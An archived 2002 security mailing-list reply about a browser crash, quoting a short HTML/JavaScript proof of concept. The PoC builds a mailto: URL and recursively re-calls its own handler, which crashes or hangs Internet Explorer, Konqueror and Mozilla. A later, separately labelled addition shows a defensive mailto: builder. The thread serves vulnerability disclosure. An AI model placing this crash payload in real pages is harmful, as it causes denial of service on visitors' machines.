Re: Buffer Overflow with all versions of Internet Explorer and Javascript.

From: Scott Mackenzie (smackenzat_private)
Date: Sun Jun 02 2002 - 16:47:52 PDT


    After a few minutes of testing it seems this does not only affect Internet
    Explorer but also the following browsers:
    
    In KDE's Konqueror (latest version) it segfaults the browser instantly.
    
    In Mozilla 0.99 it causes a denial of service situation against the
    machine, with 100% CPU usage and some crazy hard drive accessing until
    the process is killed.
    
    Other information:
    
    Netscape 6 series (latest version) does nothing when SMASH! is clicked.
    
    Galeon (latest) tries to mail a rather long email address, but the browser
    itself is unaffected.
    
    
    Test System:
    Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686 
    
    
    ---------------------------------
    Scott Mackenzie
    Cybernetics & Virtual Worlds (2)
    Bradford University
    http://smackenz.zapto.org
    ---------------------------------
    
    
    On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
    > On 28/07/1999 I discovered a stack buffer overflow caused by, up to
    > now, all versions of Internet Explorer.
    > On many Windows 98 machines it makes it necessary to reboot the machine, since
    > it seems to me that it runs out of memory.
    > It has only been proven on several versions 5 of IE on Windows NT
    > Server SP6 and Windows 98 Second Edition.  As I said before, on Windows 98
    > I had to force a reboot.
    > Could it be possible to execute arbitrary code using the variable company of
    > the example?
    > 
    > // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
    > // internet Explorer 5.00.3500.1003 on Windows98se
    > 
    > -----------cut here---------------------------
    > <html><head></head>
    > <script language="JAVASCRIPT">
    > function hacerMail() {
    >   var company;
    > 
    >   crear();
    >   address="s0t4ipv6at_private";
    >   soporte();
    > }
    > function soporte(){
    >   var soporte="billat_private";
    >   window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
    > // window.location=company;             // also this line cause the bof.
    >   close(hacerMail());
    > }
    > function crear(){
    > company="shellcode here?\n";            // i don't think so.
    > }
    > </script>
    >   <input type="button" onClick="hacerMail();" value="SMASH!"></input>
    > </html>
    > -----------cut here---------------------------
    > 
    > Regards.
    > 
    > - Internet is harmful to health -
    > - Law No. 127.0.0.1
    > 
    > Matias Sedalo 	
    > http://www.shellcode.com.ar
    > 
    > s0t4ipv6at_private
    > B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
    > .......................................
    > 
    
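The quoted proof of concept builds a mailto: URL by concatenating an unchecked value (a subject that ends in a newline) and then re-enters its own handler through close(hacerMail()). As an added example that is not part of either post, the helper below shows how a page can build such a URL defensively: each part is percent-encoded, the subject is rejected if it contains CR, LF or any other ASCII control character, addresses are checked against a simple pattern, the total length is capped, and the helper never calls back into an event handler. The function names, the length limit and the sample inputs are assumptions made for this example.

```javascript
// Added example (not from the original thread): defensive mailto: construction.
// Names, the limit and the sample values below are assumptions for illustration.

const MAX_MAILTO_LENGTH = 2000;            // assumed cap on the finished URL
const ADDRESS_RE = /^[^\s@]+@[^\s@]+$/;    // deliberately simple address check

// True when the value is a string with no ASCII control characters.
// CR/LF are the interesting ones: inside a mail header value they can be read
// as the start of a new header line by some mail clients.
function isCleanHeaderValue(value) {
  return typeof value === 'string' && !/[\x00-\x1f\x7f]/.test(value);
}

// Percent-encode an address but keep the '@' readable; RFC 6068 allows '@'
// unencoded in both the path and the header-field part of a mailto: URL.
function encodeAddress(address) {
  return encodeURIComponent(address).replace(/%40/g, '@');
}

// Returns a mailto: URL string, or null when any input fails validation.
// Nothing here navigates or recurses; the caller decides what to do with it.
function buildMailto({ address, cc, subject }) {
  if (typeof address !== 'string' || !ADDRESS_RE.test(address)) return null;
  if (cc !== undefined && (typeof cc !== 'string' || !ADDRESS_RE.test(cc))) return null;
  if (subject !== undefined && !isCleanHeaderValue(subject)) return null;

  const params = [];
  if (cc !== undefined) params.push('cc=' + encodeAddress(cc));
  if (subject !== undefined) params.push('subject=' + encodeURIComponent(subject));

  const url = 'mailto:' + encodeAddress(address) +
    (params.length ? '?' + params.join('&') : '');

  // Refuse oversized results instead of handing them to the URL handler.
  return url.length > MAX_MAILTO_LENGTH ? null : url;
}

// Constructed sample inputs (not from the thread, which obfuscates its addresses).
const okUrl = buildMailto({
  address: 'user@example.org',
  cc: 'support@example.org',
  subject: 'hello & goodbye',
});
const rejectedUrl = buildMailto({
  address: 'user@example.org',
  subject: 'shellcode here?\n',   // the thread's subject value, ending in LF
});
console.log(okUrl);        // encoded URL
console.log(rejectedUrl);  // null: control character in subject
```

The two calls at the bottom mirror the shapes in the thread: a well-formed request produces an encoded URL, while a subject carrying a trailing newline is refused rather than spliced into the URL. Assigning the returned string to window.location (once, from a click handler that does not call itself) is left to the page.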



    This archive was generated by hypermail 2b30 : Sun Jun 02 2002 - 17:30:23 PDT